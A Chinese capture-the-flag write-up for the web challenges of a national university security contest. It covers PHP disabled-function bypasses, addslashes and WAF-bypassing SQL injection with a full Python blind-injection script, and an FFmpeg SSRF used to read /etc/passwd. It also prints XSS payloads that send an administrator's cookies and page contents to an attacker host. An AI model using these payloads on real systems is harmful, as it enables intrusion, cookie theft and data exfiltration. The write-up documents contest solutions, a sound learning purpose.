第十屆全國大學生信息安全競賽-web-writeup

PHP execise

http://106.75.126.194:6789
備用 http://106.75.126.228:6789

輸入點是能夠執行php代碼的，看了一下disabled_function

assert,system,passthru,exec,pcntl_exec,shell_exec,popen,proc_open,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,fopen,file_get_contents,fread,file_get_contents,file,readfile,opendir,readdir,closedir,rewinddir, 

對很多文件操作，目錄操作函數禁用了，但是當然還是有些沒用過濾完整，導致可以列目錄，以及對文件的其他操作

列目錄

$dir="./";$file=scandir($dir);print_r($file);

copy flag文件為txt文件

copy('flag_62cfc2dc115277d0c04ed0f74e48e3e9.php','lemon.txt');

flag是flag{php_mail_ld_preload}，從flag內容來看，感覺這個題目是被非預期的很嚴重。

瞄了一下其他師傅的wp，還有很多中解法，glob讀目錄，include、show_source讀取文件

wanna to see your hat

http://106.75.106.203:1515
備用 http://61.174.9.233:1515

盲測的時候感覺很懵逼，后面目錄掃描發現了svn

http://106.75.106.203:1515/.svn/

svn恢復工具: https://github.com/kost/dvcs-ripper

主要問題還是這個str_replace

因為經過common.php中的addslashes全局對$_POST處理，這樣過濾為空的話，就只剩下了\，剛好繞過單引號的限制

http://61.174.9.233:1515/route.php?act=login
name=or/**/1=1%23'&submit=check

flag{good_job_white_hat}

flag vending machine

http://202.5.20.48/

邏輯是注冊用戶 -> 登陸 -> 購買
注冊的時候有waf，會過濾某些字符為空，比如on，select等
開始沒注意，導致登陸的時候會經常出現點莫名其妙的問題
購買的時候，我猜可能是先通過商品的id查詢出價錢，然后再從session里面獲取用戶名，直接update去扣除用戶錢包里面的錢，其中從session取值的時候沒有做過濾，雖然前面都做了。

import requests

site = 'http://202.5.20.48/'
url = site + 'register.php'
url1 = site + 'login.php'
url2 = site + 'buy.php?id=1'

headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.1 Safari/601.2.7",
          "Content-Type": "application/x-www-form-urlencoded"}

s = requests.session()

def reg(username):
  data = {
    'user': username,
    'pass' : '123456'
  }
  r = s.post(url,data=data,headers=headers)
  return r.content

def login(username):
  user = username.replace('on','')
  #print user
  data = {
    'user': user,
    'pass' : '123456'
  }
  r1 = s.post(url1,data=data,headers=headers)
  return r1.content

def get_sql():
  r = s.get(url2,timeout=1)

def bypasswaf(payload):
  # add on
  k = ['on','ff']
  for i in k:
    payload = payload.replace(i,i[0]+'on'+i[1:])

  l = ['select','union','where']
  for i in l:
    payload = payload.replace(i,i[:3]+'on'+i[3:])

  # l = ['limit']
  # for i in l:
  #   payload = payload.replace(i,i[:2]+'on'+i[2:])

  return payload

def exp(n):
  for i in range(33,127):
  #for i in range(97,123):
    # n = 25
    sql = "select table_name from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1"
    sql = "select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=database() limit 0,1"
    sql = "select thisi5f14g from fff1ag"
    #sql = "select 3456"
    sql = bypasswaf(sql)
    #user = "lemonkka'-(if(ord(mid((%s),%d,1))=%d,sleep(2),1))-0#" % (sql,n,i)
    user = "zzzkacaa'-(if(ord(mid((%s),%d,1))=%d,sleep(0.0001),1))-1#" % (sql,n,i)

    if 'exited' in reg(user):
      print 'exited!!!!!!!!!!!'
    login(user)
    try:
      get_sql()
    except:
      return chr(i)

for i in range(1,30):
  print i,'th: data'
  print exp(i)

可以得到flag: flag{bbb6b6ui1d_5q1_iz_3z}

踩坑踩在#上面，一開始不應該用%23去測，導致半天沒效果.

Guestbook

http://106.75.119.64:8888/

大概是絕望，總共是有兩個xss點，rename.php、還有一個文本提交

目錄結構:

一開始是很熟悉的套路，文本提交那有0ctf出的xss沙盒

利用新建一個iframe可繞過

var iframe = document.createElement('iframe');
iframe.src = 'about:blank';
document.body.appendChild(iframe);
window.XMLHttpRequest = iframe.contentWindow.XMLHttpRequest;

發現/upload/下是沒cookie的
然后仔細研讀了首頁這幾句

hello guest,if you want, you can rname.

You can also send message to the administrator, the administrator will review your.

猜想應該是administrator作為bot去運行文本框輸入的xss代碼，/admin/review.php提示mb, you are not admin!!!，還以為是rename修改為admin就好了

var pkav = {
  ajax: function () {
    var xmlHttp;
    try {
      xmlHttp = new XMLHttpRequest();
    } catch (e) {
      try {
        xmlHttp = new ActiveXObject('Msxml2.XMLHTTP');
      } catch (e) {
        try {
          xmlHttp = new ActiveXObject('Microsoft.XMLHTTP');
        } catch (e) {
          return false;
        }
      }
    }
    return xmlHttp;
  },
  req: function (url, data, method, callback) {
    method = (method || '').toUpperCase();
    method = method || 'GET';
    data = data || '';
    if (url) {
      var a = this.ajax();
      a.open(method, url, true);
      if (method == 'POST') {
        a.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
      }
      a.onreadystatechange = function () {
        if (a.readyState == 4 && a.status == 200) {
          if (callback) {
            callback(a.responseText);
          }
        }
      };
      if ((typeof data) == 'object') {
        var arr = [
        ];
        for (var i in data) {
          arr.push(i + '=' + encodeURIComponent(data[i]));
        }
        a.send(arr.join('&'));
      } else {
        a.send(data || null);
      }
    }
  },
  get: function (url, callback) {
    this.req(url, '', 'GET', callback);
  },
  post: function (url, data, callback) {
    this.req(url, data, 'POST', callback);
  }
};
pkav.post('http://106.75.119.64:8888/rename.php','nname=admin',function(data){
  pkav.get('http://106.75.119.64:8888/',function(data){
    pkav.get('http://106.75.119.64:8888/admin/review.php',function(data){
      var content = window.btoa(document.cookie).concat(window.btoa(data));
      var n0t = document.createElement("link");
      n0t.setAttribute("rel", "prefetch");
      n0t.setAttribute("href", "//ipipip/".concat(content));
      document.head.appendChild(n0t);
    });
  });
});

請求了一番，從源碼、cookie中並未發現flag,最后通過ajax請求/admin/訪問時403是無返回的,還以為會把flag藏在這個頁面,通過Iframe獲取網頁信息以及cookie,發現flag在里面,才意識到cookie path路徑問題.

<script>
var iframe = document.createElement("iframe");
iframe.setAttribute("src", "/admin/");
document.body.appendChild(iframe);
iframe.addEventListener( "load", function(){
  var content = iframe.contentWindow.document.cookie;
  var n0t = document.createElement("link");
  n0t.setAttribute("rel", "prefetch");
  n0t.setAttribute("href", "//ipipip:8080/".concat(window.btoa(content)));
  document.head.appendChild(n0t);
}, false);
</script>

flag:flag{cr4ck_c5p_m4ybe_3z}

方舟計划

http://123.59.71.217

注冊的時候，phone存在問題，但是測試發現直接攔截了一些關鍵字，select from直接攔截，但是可以用select /*!50000from*/去繞過

username=xxee1&phone=-12' and extractvalue(0x2a,concat(0x2a,(select table_name /*!50000from*/ information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1))) and '1'='1&password=1234&repassword=1234

查詢當前user表的時候需要另外的select一次，可得到用戶名、密碼
username=xxee1&phone=-12' and updatexml(1,concat(0x7e,(select a.name /*!50000from*/ (select password as name /*!50000from*/ user where id=1 limit 0,1)a)),0) and '1&password=1234&repassword=1234

fangzh0u
mIiD2wpTUTnWDzJO6d329w==

從config表中的secrectkey得到一個密鑰

AES解密得到密碼tencent123

后面就是前段時間出的FFmpeg的ssrf漏洞，可以讀取本地文件內容
利用工具：https://github.com/neex/ffmpeg-avi-m3u-xbin

從/proc/self/cmdline獲取到網站路徑

但是讀取web目錄源碼並未發現flag，讀取/etc/passwd上傳被攔截了，發現是針對特定的關鍵字進行攔截，file:///etc//passwd即可繞過，發現

最后讀取/home/s0m3b0dy/flag得到flag

做題過程中，學到一個新的姿勢點

向數據庫插入記錄時，有時會有這種需求，當符合某種條件的數據存在時，去修改它，不存在時，則新增，也就是insertOrUpdate操作
INSERT ... ON DUPLICATE KEY UPDATE Syntax
http://blog.csdn.net/ghsau/article/details/23557915